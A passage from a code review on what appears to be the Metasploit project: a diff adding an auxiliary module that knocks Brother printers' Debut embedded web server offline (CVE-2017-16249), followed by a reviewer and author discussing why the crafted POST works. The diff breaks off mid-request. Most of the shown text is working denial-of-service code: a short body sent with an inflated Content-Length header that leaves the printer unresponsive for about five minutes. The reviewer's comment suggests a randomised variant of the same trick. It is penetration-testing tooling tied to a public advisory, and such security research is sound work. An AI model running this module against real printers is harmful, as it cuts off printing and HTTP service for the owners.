modules/auxiliary/dos/http/brother_debut_dos.rb

```diff
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Brother Debut http Denial Of Service',
+      'Description'    => %q{
+        The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial
+        of Service (DoS) condition via a crafted HTTP request.  The printer will be
+        unresponsive from HTTP and printing requests for ~300 seconds.  After which, the
+        printer will start responding again.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'z00n', # vulnerability disclosure
+        'h00die' # metasploit module
+      ],
+      'References'     => [
+        [ 'CVE', '2017-16249' ],
+        [ 'URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-017/?fid=10211']
+      ],
+      'DisclosureDate' => 'Nov 02 2017'))
+  end
+
+  def is_alive?
+    res = send_request_raw({
+      'method'	=>	'GET',
+      'uri'	=>	'/',
+    },10)
+
+    return !res.nil?
+  end
+
+  def run
+
+    begin
+      time = Time.new
+      print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}.  Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
+      # This request will set DoS the server for ~300 seconds
+      send_request_cgi({
+        'method'	=>	'POST',
+        'uri'		=>	'/',
+        'data'		=>	'asdasdasdasdasdasdasd',
+        'headers'       => {
+          # These are kept here since they were in the original exploit, however they are not required
+          #'Host' => 'asdasdasd',
+          #'User-Agent' => 'asdasdasd',
+          #'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+          #'Accept-Language' => 'en-US,en;q=0.5',
+          #'Referer' => 'asdasdasdasd',
+          #'Connection' => 'close',
+          #'Upgrade-Insecure-Requests' => 1,
+          #'Content-Type' => 'application/x-www-form-urlencoded',
+          'Content-Length' => 42
```

Comment:
The advisory is a bit light on technical detail. My guess is that the `Content-Length` has to be larger than the request body, in which case something like this should also work: `data.length + rand(10) + 10`.

Reply:
I agree, it prob hangs waiting on more data that doesn't arrive. I'll try it out more later